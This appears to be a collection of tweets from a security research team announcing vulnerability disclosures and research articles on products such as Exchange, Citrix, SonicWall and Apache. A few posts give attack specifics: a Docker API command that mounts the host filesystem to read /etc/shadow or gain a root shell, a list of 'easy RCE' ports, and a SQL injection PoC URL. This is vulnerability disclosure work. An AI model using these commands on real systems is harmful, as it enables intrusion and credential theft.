New attack! Our researcher Arseniy Sharoglazov has discovered a method to connect to LDAP via #MSExchange from the Internet and access the whole Active Directory database. Read the research: swarm.ptsecurity.com/attacking-ms-e…

OpenFire allows to get Arbitrary File Read and Unauthenticated Full Read SSRF via its 9090/http and 9091/https ports. The details are in the article by Alexandr Shvetsov (CVE-2019-18393 & CVE-2019-18394): swarm.ptsecurity.com/openfire-admin…

The advisory for an Unauthenticated Arbitrary File Read vulnerability in Citrix XenMobile (CVE-2020-8209) found by our researcher Andrey Medov is now out! The fixes were released privately 3 weeks ago, so we hope a lot of companies are protected now 🙂 support.citrix.com/article/CTX277…

Kerberoasting without SPNs! Read the research by Arseniy Sharoglazov: swarm.ptsecurity.com/kerberoasting-…

We are releasing an article about an Authenticated Arbitrary File Read vulnerability (CVE-2019-19499) in Grafana! Dive into Go SQL client libraries, quirks of the MySQL protocol, and more! swarm.ptsecurity.com/grafana-6-4-3-…

The advisory for an authenticated Java Deserialization vulnerability in IBM Maximo (CVE-2020-4521), found by our researchers Andrey Medov & Arseniy Sharoglazov, is now out! ibm.com/support/pages/…

Checkpoint patched a vulnerability in a Gaia OS component (CVE-2020-6020) discovered by our researchers Mikhail Klyuchnikov & Nikita Abramov. Argument Injection led to Arbitrary File Reading with root privileges and DoS. supportcenter.checkpoint.com/supportcenter/…

💥Easy RCE Ports Java RMI: 1090,1098,1099,4444,11099,47001,47002,10999 WebLogic: 7000-7004,8000-8003,9000-9003,9503,7070,7071 JDWP: 45000,45001 JMX: 8686,9012,50500 GlassFish: 4848 jBoss: 11111,4444,4445 Cisco Smart Install: 4786 HP Data Protector: 5555,5556 #ptswarmTechniques

11 SonicWall CVE-s 460.000 hosts by shodan 1 researcher - Nikita Abramov Stack Overflow, Heap Overflow, Memory Leak and more! CVE-2020-5133,34,...,43 CVSS: 9.4 to 5.3 Update your systems! 👉psirt.global.sonicwall.com/vuln-list

💉Advanced MSSQL Injection Tricks💉 🩸 New DNS Out-Of-Band vector in SELECT statement 🩸 Quick exploitation: Get all table data in one query 🩸 Read local files in SELECT statement and more! Read the article: swarm.ptsecurity.com/advanced-mssql…

Checkpoint ICA Management Tool (CVE-2020-6020) research by Mikhail Klyuchnikov & Nikita Abramov. 1⃣Send /etc/shadow to yourself via SMTP 2⃣Simple DoS swarm.ptsecurity.com/vulnerabilitie…

💥Easy RCE using Docker API on port 2375/tcp docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine File Access: cat /mnt/etc/shadow RCE: chroot /mnt #ptswarmTechniques

VMware fixed a Post-Auth RCE in vSphere Replication (CVE-2021-21976) found by our researcher Egor Dimitrenko. Advisory: vmware.com/security/advis…

SonicWall fixed a Post-Auth RCE (CVE-2021-20026) in Network Security Manager and an Unauth Buffer Overflow (CVE-2021-20027) in SonicOS found by our researcher Nikita Abramov. Advisory: psirt.global.sonicwall.com/vuln-detail/SN…

🐞PoC for a boolean-based #SQLi in Rapid7 Nexpose <= 6.6.48 (CVE-2020-7383) https://nexpose.local:3780/data/discoveryAsset/config/folderPath?path=[sqli]

🚨RCE on a backend IIS server via file upload with an atypical file extension. 📋More community curated payloads can be found at github.com/swisskyrepo/Pa… #tipstoknow

We are thrilled to announce the following presentations at hardwear.io, Black Hat, #POC2021 and Hack In Paris

New article: "Cisco Hyperflex: How We Got RCE Through Login Form and Other Findings" Read more about critical vulnerabilities (CVSS 9.8, 7.3 and 5.3) found by our researchers markmark & @__mn1__ : swarm.ptsecurity.com/cisco-hyperfle…

🔥 We have reproduced the fresh CVE-2021-41773 Path Traversal vulnerability in Apache 2.4.49. If files outside of the document root are not protected by "require all denied" these requests can succeed. Patch ASAP! httpd.apache.org/security/vulne…

✅ The way to bypass #XSS WAF in ASP.NET web applications. #tipstoknow